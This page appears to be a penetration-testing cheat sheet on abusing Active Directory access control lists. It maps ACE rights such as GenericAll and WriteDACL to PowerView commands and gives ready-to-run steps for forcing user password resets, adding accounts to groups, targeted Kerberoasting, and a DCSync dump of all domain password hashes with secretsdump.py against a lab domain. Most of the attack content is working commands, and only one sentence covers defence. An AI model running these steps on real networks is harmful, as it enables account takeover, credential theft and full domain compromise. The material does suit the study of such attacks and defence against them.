Skip to main content

Access Control List (ACL)

Access Control Lists (ACLs) define permissions for objects like users, groups, and computers. They consist of Access Control Entries (ACEs) that specify allowed or denied actions for security principals. ACLs help enforce security by restricting or granting access to AD resources.

There are two types of ACLs in Active Directory:

  1. Discretionary Access Control List (DACL) – Defines permissions for users and groups, specifying who can access an object and what actions they can perform.
  2. System Access Control List (SACL) – Used for auditing, it determines which actions on an object are logged in the security event log.

Interesting Abuses

ACEsAbused With
ForceChangePasswordSet-DomainUserPassword
Add MembersAdd-DomainGroupMember
GenericAllSet-DomainUserPassword, Add-DomainGroupMember
GenericWriteSet-DomainObject
WriteOwnerSet-DomainObjectOwner
WriteDACLAdd-DomainObjectACL
AllExtendedRightsSet-DomainUserPassword, Add-DomainGroupMember
AddselfAdd-DomainGroupMember

Enumerate ACLs

access-control-list-acl.md

Authenticate to a User

$JethalalPassword = ConvertTo-SecureString 'PASSSWORD-OF-JETHALAL' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('REZYDEV\jethalal', $JethalalPassword)

Password Change Abuse

warning

Rights Needed: ForceChangePassword, GenericAll/GenericWrite, WriteDACL, ResetPassword

# Target User Credentials
$BhidePassword = ConvertTo-SecureString 'Bhide123@' -AsPlainText -Force

# Import PowerView for 'Set-DomainUserPassword'
Import-Module .\PowerView.ps1

### [AUTHENTICATE TO THE USER AND MAKE $CREDS VARIABLE]
# Change Bhide's Password, i.e Jethalal has ForceChangePassword or similar permission
# to user Bhide
Set-DomainUserPassword -Identity bhide -AccountPassword $BhidePassword -Credential $Cred -Verbose

Add/Remove a User to a Group

# Checking if the user is already part of the group
Get-ADGroup -Identity "Science Faculty" -Properties * | Select -ExpandProperty Members

# Adding the User
### [AUTHENTICATE TO THE USER AND MAKE $CREDS VARIABLE]
Add-DomainGroupMember -Identity 'Science Faculty' -Members 'bhide' -Credential $Cred -Verbose

# Verify the Addition
Get-DomainGroupMember -Identity "Science Faculty" | Select MemberName

# Remove the User
Remove-DomainGroupMember -Identity "Science Faculty" -Members 'bhide' -Credential $Cred -Verbose

# Verify Removal
Get-DomainGroupMember -Identity "Science Faculty" | Select MemberName |? {$_.MemberName -eq 'bhide'} -Verbose

Targeted Kerberoasting Attack

warning

Rights Needed: GenericAll/GenericWrite, WriteProperty or Validated-SPN

Tool: https://github.com/ShutdownRepo/targetedKerberoast

targetedKerberoast.py -v -d "$DC_HOST" -u "$USER" -p "$PASSWORD"

Kerberoast from:

DCSync

DCSync is a technique used by attackers to mimic the behavior of a domain controller (DC) and extract password hashes from Active Directory. It abuses the Directory Replication Service (DRS) protocol, which is meant for syncing data between DCs. By obtaining the necessary permissions, an attacker can request and retrieve credentials for all users, including domain administrators, without needing direct access to the DC itself. This makes it a powerful method for gaining control over an entire domain.

The attack works by using tools like Mimikatz to send replication requests to the DC. If the attacker has compromised an account with Replicating Directory Changes and Replicating Directory Changes All privileges, the DC treats them as a legitimate replication partner and responds with password hashes. These hashes can then be cracked offline or used for pass-the-hash attacks to escalate privileges. Organizations can defend against DCSync by monitoring unusual replication requests, restricting replication permissions, and implementing strong account security practices.

secretsdump.py

# Extract NTLM Hashes and Kerberos Keys
python3 /path/to/secretsdump.py -outputfile hashes -just-dc REZYDEV/jethalal@192.168.1.7
## Note: '-just-dc-ntlm' for NTLM Hashes only
## or '-just-dc-user bhide' for targeted approach.

More